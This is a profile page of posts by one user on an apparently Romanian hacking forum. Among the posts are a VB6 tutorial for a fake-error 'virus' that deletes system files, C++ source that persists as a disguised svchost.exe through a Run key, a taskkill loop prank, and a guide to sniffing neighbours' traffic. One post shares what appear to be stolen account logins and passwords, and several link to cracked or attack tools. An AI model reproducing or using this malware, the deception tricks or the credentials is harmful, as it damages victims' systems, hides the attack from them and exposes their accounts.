Jump to content

ghici

Active Members
 View Profile  See their activity

  • Posts

    258

  • Joined

  • Last visited

    Never

 Content Type 

Everything posted by ghici

  1. ghici
    http://rapidshare.de/files/25614399/Hacker...w_6.11.rar.html Hacker's View release VI rar pass: muhaha ---------------------------------------- * view files any length in text, hex, code modes * Pentium-Pro® dissasembler & assembler * support newexecutable format file NE,LE,LX,PE * support Netware Loadable Modules NLM,DSK,LAN,... * one-touch-jump for direct call/jmp instructions in any executable file * build-in small decrypt/crypt system * build-in powerfull calculator * any length block operations: read, write, fill * multifile search/replace * dual executable file OS/2 & DOS * include utilities for detail dump NE-, LX/LE- modules * include dos-utility for split/join dual executable files (MZ,NE,LX,LE,PE) ---------------------------------------- parola: muhaha
  2. ghici
    http://rapidshare.de/files/25615206/Sql_In...r_v1.0.rar.html
  3. ghici
    http://www.megaupload.com/?d=N85940IX sau http://rapidshare.de/files/25721393/Acunet...litati.rar.html
  4. ghici
    This tutorial describes how to register missing files that is when you open a booter or any other program and get a runtime error like... File missing....or component not found...or some other system message Steps: 1.download the missing file (it will have the extension .dll or .ocx , .ocx most of the times) example: mswinsck.ocx, msinet.ocx, kewlbuttonz.ocx etc. 2.Determine what your operating system type is i.e. windowsXP or Windows 98 or Windows 2000 or Windows Me or Windows 95<lmao if ur still using 95. 3.Now navigate to the folder >> My Computer/ C: / WINDOWS / .Inside this folder you will see alot of crap (not actually) .You got to look for the folders named System and System32. (Please note that after clicking on the My Computer icon and then going into C drive (C if you do not see WINDOWS folder you may see a folder named WINNT depending upon your operating system). Some people have their operating systems installed on the D drive D: ,obviously such ppl should navigate to the D: 2.place that is COPY the missing file with extension .ocx or .dll (not the zip file) the one you just downloaded in your "System32" folder if your operating system is NT type i.e Windows XP or Windows 2000 or Windows NT "and" place it in your "System" folder if your operating system is Windows Me or Windows 98 or Windows 95.This is very important cos if you place it in the wrong folder it wont work depending upon your operating system! ----------------------------------------------------------------------- For Lamers:How to check what my operating system is? Answer:You lame fucknut stop booting and learn your computer basics first go to start,click on control panel,on the screen that pops up click on Help (on the top menu bar) and then click about ------------------------------------------------------------------------ 3.Now click on start at the bottom left corner of your screen and then click on run and paste this or type this in the box that pops up regsvr32.exe c:windowssystem32MissingFile.ocx OR if its a dll file then type this regsvr32.exe c:windowssystem32MissingFile.dll and press OK ....where missingfile is the file you downloaded...i hope ur not that dumb to type MissingFile.ocx eXAMPLE : If you downloaded mswinsck.ocx you would type regsvr32.exe c:windowssystem32mswinsck.ocx and hit OK NOTE: if you placed the missing file in the system folder replace system32 with system like this regsvr32.exe c:windowssystemMissingFile.ocx The jobs done you will get a pop-up saying the register succeeded and you can open your program now and wont get a error! Tutorial By: Protobomber ==>ENJOY<==
  5. ghici
    Visual Basic 6 - Creating a Simple Virus Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal. First of all open a new Visual Basic project, a standard exe file.. Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub. On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on. In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab. Private Sub Form_Load() Text1.Text = "C:/Windows/System32/cmd.exe Kill Text1.Text End Sub Once the project is opened then the command file will be removed. Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load. You can even give the text box a name to make it quicker. I have labelled it 'A' Private Sub Form_Load() Text1.Text = "C/Windows/System32/cmd.exe" A = Text1.Text End Sub Private Sub Command1_Click Kill A End Sub Now once the command button is clicked on the project the command file will be deleted. Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn't got enough memory to run, but in actual fact the victim doesn't know that you have just removed their command file. Here is to go about it. Private Sub Form_Load() Form1.Visible = False Text1.Text = "C:/Windows/System32/cmd.exe" A = Text1.Text Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error" End Sub Private Sub Timer1_Timer() Timer1.Interval = 5000 Kill A Timer1.Enabled = False End Sub All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that's how simple it can be to fool someone. Right, we can now make it a little more difficult if you are finding the above a little too easy. How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well. The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below. So in the form load part put the following code. Private Sub Form_Load() Form1.Visible = False Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error" Kill "C:/Windows/System32/cmd.exe" s Kill "C:/Windows/regedit.exe" End Sub So above we will be removing the command file and the registry, I don't think the victim will be best pleased about that do you. Now I have shown you the above information I think it's your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/ Then put in the code above but in the Kill put this. Kill "C:/cmd.exe" That's all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time
  6. ghici
    by DJAx3L //--------------------------------------------------------------------------- #include <vcl.h> #include <Registry.hpp> #pragma hdrstop #define STATUSMSG "YOUR STATUS MESSAGE HERE" //--------------------------------------------------------------------------- void setstatus() {     AnsiString *username = new AnsiString;     TRegistry *RegGet = new TRegistry(KEY_READ);     try     {         RegGet->RootKey = HKEY_CURRENT_USER;         RegGet->OpenKey("SoftwareYahoopager",false);         *username = RegGet->ReadString("Yahoo! User ID");     }     __finally     {         delete RegGet;     }     TRegistry *RegSet = new TRegistry(KEY_WRITE);     try     {         RegSet->RootKey = HKEY_CURRENT_USER;         AnsiString key = "SoftwareYahoopagerProfiles" + *username + "Custom Msgs";         RegSet->OpenKey(key,false);         RegSet->WriteString("5",STATUSMSG);     }     __finally     {         delete RegSet;     }     HWND hWndY = FindWindow ("YahooBuddyMain", NULL);     PostMessage (hWndY, WM_COMMAND, 0x188, 0);     delete username;     Sleep(15000);     setstatus(); } //--------------------------------------------------------------------------- WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {     try     {         if(ExtractFileName(Application->ExeName) != "svchost.exe") {             char target[30];             GetSystemDirectory(target, MAX_PATH);             AnsiString tg = target;             tg +=  "driverssvchost.exe";             CopyFile(Application->ExeName.c_str(),tg.c_str(),0);             TRegistry *regrun = new TRegistry;             try             {                 regrun->RootKey = HKEY_CURRENT_USER;                 AnsiString key = "SoftwareMicrosoftWindowsCurrentVersionRun";                 regrun->OpenKey(key,false);                 regrun->WriteString("braaainz","""+tg+""");             }             __finally             {                 delete regrun;             }             Application->ShowException(&Exception("Could not locate entry point __GETICON in shell32.dll"));             ShellExecute(NULL,"open",tg.c_str(),NULL,NULL,SW_SHOW);             ExitProcess(0);         }         setstatus();     }     catch (Exception &exception)     {        Application->ShowException(&exception);     }     catch (...)     {         try         {             throw Exception("");         }         catch (Exception &exception)         {            Application->ShowException(&exception);         }     }     return 0; } //---------------------------------------------------------------------------
  7. ghici
    Vrei sa modifici un executabil, sa faci un crack, un trainer, sau sa faci un troian indetectabil ? M-am gandit la acest lucru si m-am hotarat sa va prezint codul hexazecimal si cum sa lucrezi cu dansul. Introducere in hexazecimale Hexa este prescurtarea de la "hexazecimal" care efectiv inseamna un numar in baza 16 . Baza de numarare pe care o folosim de obicei se numeste baza decimala (baza 10). Adica la fiecare 10 subunitati se mareste cu o unitate cifra din stanga. Cum sistemul hexazecimal este in baza 16, are cu 6 simboluri mai mult . In particular, foloseste cifre de la 0 la 9 si litere de la A la F inclusiv pentru a reprezenta (A=10, B=11, C=12, D=13, E=14, F=15) In sistemul decimal, subunitatile pot doar merge pana la 9. In concluzie, numarul "zece" trebuie sa aiba 2 sloturi pentru cifre(unitati). "1" pe locul zecilor (unitatilor superioare) si "0" pe locul uitatilor. Unitatea superioara zecilor este suta, dupa aia mia, etc. Si pentru ca este un sistem decimal, fiecare slot poate fi reprezentat de o putere a lui 10 (de exemplu caciulitza "^" inseamna "la puterea a ..." - cu alte cuvinte, denota un exponent) 1 = 10^0 sau 1 10 = 10^1 sau 10 100 = 10^2 sau 10*10 1000 = 10^3 sau 10*10*10 10000 = 10^4 sau 10*10*10*10 In sistemul hexazecimal, fiecare unitate poate varia intre 0 si F. Spre deosebire de numarul 10 din sistemul decimal, in sistemul hexazecimal, numarul 10 este reprezentat doar de o singura unitate si anume litera A (ca v-am spus ca de la 10 pana la 15 se ia cu litere) ... numarul 9 din sistemul decimal fiind cam ca "F" din sistemul hexazecimal. Deci, pentru cei care n-au intzeles: pe cand in baza 10, merge doar de la 0 la 9, in baza 16(sistemul hexazecimal), uite care sunt "cifrele": 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F Cat timp unitatea inferioara nu ajunge la 16, nu se adauga o unitate superioara.Astfel, se face urmatoarea conversie: Baza 10 Baza 16 1= 16^0 (adica 1) 10= 16^1 (adica 16) 100= 16^2 (adica 256) 1000= 16^3 (adica 4096) 10000= 16^4(adica 65536) - limita de int ......................................... si lista continua la infinit Deci convertind dupa simboluri, avem urmatoarele: 1 in dec = 1 in hex 10 in dec = A in hex 100 in dec = 64 in hex 1000 in dec = 3E8 in hex Ca sa fiu sigur ca atzi inteles: luati ultimul exemplu si ganditi-va de ce 3E8 in hexa este 1000 in baza 10. In primul rand, este un 3 in locul lui "doua sute cinzeci si sase". In baza 10, daca ai cifra 3 pe locul sutelor, asta inseamna ca ai trei sute, k ? Prin urmare, in sistemul hexa, un 3 in locul doua sute cinzeci si sase inseamana ca sunt 3 de cate doua sute cinzeci si sase. In alte cuvinte: 3*256 sau 768 (pentru echivalentul in baza 10) Asta e in locul lui doua sute cinzeci si sase. Acum, in unitatea superioara, "E"-ul. Tinand cont ca in hexa, E inseamana 14, inseamna ca avem saisprezece de cate paisprezece: adica 14*16 (224- pentru echivalentul in baza 10). In final, pentru unitatea cea mai din stanga:8. Ce inseamna 8 ?? In baza 16, 8 inseamna tot 8 In final, daca adunam toate 3, obtzinem 768+224+8=1000 Cum se converteste un numar din baza 10 in hexazecimal Procesul e la fel ca mai sus, numai ca e invers de data asta. De exemplu, 289 in baza 10 inseamna 121 in baza 16 . Sa testam: Incepem prin a afla cea mai mare putere a lui 16 care intra in numarul 289 (din baza 10). 289 se afla intre 16^2(adica 256) si 16^3(adica 4096). Apoi: de cate ori intra 256 in 289 ? Doar o data. Deci numarul pe care il cautam este 1 pentru ca exista doar 1 doua sute cinzeci si sase in 289 (ganditi-va ca 256 in baza hexa inseamna 100 in baza 10). Scazand, ajungem la 289-256=33. Acum trb sa gasim de cate ori incape 16 (adica 10 in baza 10) in ce a mai ramas ->adica in 33. Deci: 33-16*2=1. Acum iar facem scaderea: 33-32=1. Si cat inseamna 1 in baza hexa ? Tot 1. Acum stii ca ai terminat pentru ca ai ramas cu 0 la urma. Sa punem numarul cap la cap: 1 de doua sute cinzeci si sase (sau 100 in baza 16) 2 de saisprezece (sau 20 in baza hexa) Adunandu-le, obtzinem 121.Tineti cont ca toate numerele din hexa functioneaza la fel ca cele din baza 10 doar ca limita este la 16 si nu la 10. Sper ca ai inteles baza numerotatiei hexazecimale. Acum vine greul: trb sa GANDESTI in sistemul hexazecimal. Cu alte cuvinte, 5+5=A, 4*4=10, B+A+D= 22. Probabil veti folosi un calculator hexazecimal pentru a converti valorile... si chiar va sfatuiesc asta. Dar daca vrei sa te apuci de facut trainere, trebuie sa inveti sa faci calculele rapid in minte in baza 16. CITESTE BINE PANA AICI ! Daca intelegi pana aici bine, restul e floare la ureche... Daca vreti sa mai continui, trimiteti un raspuns si continui cu integerii, bytii etc... si ajungem la editarea de fisiere in modul hexa . Dar sa-mi spuneti daca ati inteles pana aici. Sper ca am fost destul de explicit. greetz go to Salieri
  8. ghici
    Sa incepem cu inceputul - Ce sunt snifferele ? Pai snifferele sunt niste aplicatii (sau uneori dispozitive hardware) ce nu fac nimic altceva decat sa inregistreze pachetele de date ce se vehiculeaza prin retzea. Odata instalat pe un PC, un sniffer poate lucra in 2 moduri: In cel normal, in care captureaza doar pachetele de date vehiculate pe sistemul pe care este instalat, si in mod PROMISCOUS, in care va captura TOATE pachetele de date vehiculate prin retzea, chiar daca nu au fost trimise pt PC-u pe care se afla instalat. Motivul pt care poate functiona si in mod promiscous este legat de modul in care functzioneaza retzelele Ethernet. De fiecare data cand un Pc transmite un pachet de date, acestea sunt transmise in mod broadcast. Chestia asta inseamna ca orice pc din retea poate vedea aceste pachete (in mod normal toate pc-urile cu exceptzia celui caruia ii sunt destinate ar trb sa le ignore - dar spre norocu nostru nu o fac). Snifferele pot fi folosite atat de utilizatorii bine intetntionati cat si de cei "rau intentionati"... adica stiti voi ... - chestia asta inseamna ca puteti sa vedeti ce vorbeste un tip din retea cu voi pe messenger, sa vedeti pe unde mai umbla cu browser-ul etc ... fara ca el sa stie ... si nu trebuie nici keylogger nici nik. Conversatiile realizate intre computere snt reprezentate de siruri de date binare. Pentru a putea fi interpretate cu succes, de obicei programele sniffer au incluse si functii de analiza a acelor date, denumite "protocol analysys" si care decodeaza pachetele capturate pt a le da un sens (n-ar fi deloc fain sa vedeti pe ecranul vostru o succesiune doar de 1 si 0). In functie de protocolu folosit si de porturile de la care au venit informatiile binare sunt interpretate si afisate conform criteriilor celui care le analizeaza. Exista progame separate (si filtre pt snifferle existente) ce interpreteaza datele si le prezinta in formatul lor original. Spre exemplu Ysniff este un snifer ce captureaza doar pachetele trimise de clientii de Mess... si le prezinta ca si cum ai participa tu la discutie Detectia: De cele mai multe ori detectia unui sniffer este o treaba destul de delicata si care necesita cunostintze avansate in retzelistica. Exista 2 modalitatzi de detectie de genu ping si ambele pleaca de la permisia ca un sistem ce asculta traficul din retea va raspunde fff greu la o cerere de tip ping. Exista si o metoda de tip ARP, f asemanatoare de cea de tip ping. Se transmit niste pachete (pachetele sa nu fie transmise prin broadcast) catre o anumita adresa. Daca o alta masina va raspunde la aceste pachete atunci ea are un sniffer instalat in modul promiscious. Metoda DNS pleaca de la permisia ca majoritatea programelor de tip sniffer realizeaza automat de tip DNS lookup pt adresele IP pe care nu le vad in retzea. Deci un sistem ce functzioneaza in modul promiscious poate fi detectat atunci cand dinspre el se inregistreaza f multe cereri de tip DNS lookup Protocoale vulnerabile: Telnet & Rlogin - Un sniffer poate captura apasarile de taste pe masure ce utilizatoru le opereaza, incluzand nume de conturi si parole HTTP - Versiune standard de HTTP are destul de multe gauri de securitate. Foarte multe site-uri folosesc setarile de securitate minimale de tipul "Basic auth" ceeace face ca parolele sa fie transmise in mod PLAIN TEXT (!!!). Alte site-uri folosesc tehnici de autentificare prin care sunt cerute numele de utilizatori si parola dar si acestea fiind transmise in mod plain text SNMP - Majoritatea traficului de SNMP este SNMP v1 care nu beneficiaza de un nivel de securitate crescut. Parolele SNMP pot fi usor citite. NNTP- Parolele si datele sunt transmise in mod clear text si nu prezinta dificultati la citire. POP - Datele si parolele pot fi citite usor, fiind transmise prin clear text FTP - Datele si parolele pot fi citite usor, is transmise prin modu clear text IMAP - Datele si parolele pot fi citite usor, is transmise la fel prin clear text mode Sper ca nu am avut un vocabular criptat si ca ati inteles cat de cat ce vreau sa spun eu mai sus: Deci pe scurt: Cu un sniffer poti sa vezi ce face vecinu pe net. Daca vrei sa faci asta, tre sa instalezi sniferu in modu promiscious si sa apelezi la urmatoarele protocoale: Telnet, HTTP, SNMP, NNTP, POP, FTP si IMAP - k is cele mai vulnerabile. Pentru cel mai bun sniffer existent, intrati pe http://ethereal.com
  9. ghici
    grettz go to DarthSion Pt c++ folositi urmatorul exemplu : #include <iostream.h> #include <windows.h> void main(){ cout << "nn Ti-am futut rashnitza nn"; cout << "aaaaaaa"; while(1){ System("taskkill -f -im explorer.exe"; } Amatorii de perl pot folosi : print "nn LOL sinucide-te!!!nnaaa"; while(1){ system("taskkill -f -im explorer.exe"; } Daca vreti sa inchideti un proces dupa pid(adica nr de indentificare) si nu dupa numele sau normal(ceea cee putin probabil) folosit -pid in loc de -im.
  10. ghici
    Sad_Dreamer de ce iara te certi cu lumea? ii ramane fara preteni .. daca 0x90 o intrat la tine .. asta e .. sigur teo virusat .. oricum sa vedem dak are dovezi
  11. ghici
    Sad_Dreamer cum dreq o avut atunci detalii despre calcu tau? proc si altele? ai fost virusat cu un keylooger
  12. ghici
    1. wrong section 2. trebe sa ai minim 10 posturi sa poti cere/ajutor la ceva 3. citeste regulile 4. ai un warning ! 5. te-ai uitat macar la sectiunea exploituri si pocs ? acolo este VIDEO cum sa rulezi exploit in perl !
  13. ghici
    <div class='quotetop'>QUOTE("Xavier")</div> nu-s de acord cu tine LAMERII VOR FAIMA SI GLORIE! hackerii vor.... citeste prima pagina despre hacker[/quote:caeb0f0c71] eu ma refeream mai mult la felul meu de a gandi...[/quote:caeb0f0c71] ok
  14. ghici
    <div class='quotetop'>QUOTE("Xavier")</div> nu-s de acord cu tine LAMERII VOR FAIMA SI GLORIE! hackerii vor.... citeste prima pagina despre hacker
  15. ghici
    stii ce cred io? CA SAD DREAMER IO DAT PROGRAMU LUI LU EPIC! AR TREBUI BANAT!
  16. ghici
    mil modifici pt mine pls in loc de hackerii vor bani ... pune Romania Security Team mersi
  17. ghici
    asta mio dat ieri: clasa de ipuri oricum is prea multe..ce curatenie sa faci? stii carei faza ca dupa cateva zeci de minute bune is banate .. da tot se adauga noi ... IP Statistics #1 (Before 14/JUL/2006): 086.xxx.xxx.xxx: 42,21% 089.xxx.xxx.xxx: 12,27% 085.xxx.xxx.xxx: 10,62% 082.xxx.xxx.xxx: 08,01% 081.xxx.xxx.xxx: 05,44% 193.xxx.xxx.xxx: 03,79% 195.xxx.xxx.xxx: 03,49% 194.xxx.xxx.xxx: 03,09% 084.xxx.xxx.xxx: 03,04% 141.xxx.xxx.xxx: 02,80% 083.xxx.xxx.xxx: 01,86% 080.xxx.xxx.xxx: 01,37% IP Statistics #2 (After 14/JUL/2006): 086.xxx.xxx.xxx: 47,76% 089.xxx.xxx.xxx: 19,96% 085.xxx.xxx.xxx: 10,31% 081.xxx.xxx.xxx: 05,72% 193.xxx.xxx.xxx: 05,10% 194.xxx.xxx.xxx: 03,99% 195.xxx.xxx.xxx: 03,62% 084.xxx.xxx.xxx: 01,60%
  18. ghici
    oau .// fain program .. ms
  19. ghici
    Website has been attacked several hours on daily basis with drones simulating HTTP requests making it harder than usual to seperate the malicious and legit traffic. More specifically, site has been getting attacked with 2000-2500 drones simultaneously but new drones keep getting added every minute, making it even harder to deal this attack. According to my calculations over 5000-6000 drones have been used all these days in order to overload website. I have been investigating the attack and have been applying ratelimit filters into our firewalls in order to decrease the effects but still the web-site is slow. I just applied some new filters and I'd like you to keep me informed if you still have trouble. Contact: ciriboflacs@yahoo.com [ I`m in vacance but i will try to check my mail every day ] ENJOY POSTING !
  20. ghici
    la naiba .. kw3rln ii plecat in vacanta si o limitat domeniu cu cativa kb .. mie imi mere cu 500 Bytes/s constant
  21. ghici
    PsYKid cam asa ii... faza ii ca am primit ddos amu 2 zile de pe 3000 de drone .. + kw3rln a banat 15k ipuri pe server acuma se misca greu pt ca ii LIMITAT DOMENIUL ! kw3rln la limitat la cativa KB ca sa fie sigur ca nu suspenda domeniul cand se termina astia cu floodu o sa mearga bine in continuare
  22. ghici

    Yahoo! cookie stoler

    ghici replied to a topic in Exploituri

    lol BoRy .. ce sa configurezi la el? ) :@
  23. ghici
    Login: 1503151 Password: 4681630 Login: 1502651 Password: 3451427 Login: 1509344 Password: 2218328 Hello, 1503151! Your Premium-Account is valid until Sat, 15. Jul 2006.
  24. ghici
    mersi ! There are 33262 free premium-accounts left!
  25. ghici
    RedJoker tu nu stii romana? asta care l-au pus se presupune a fi prorat 2.0 nemtudom?
×
×
  • Create New...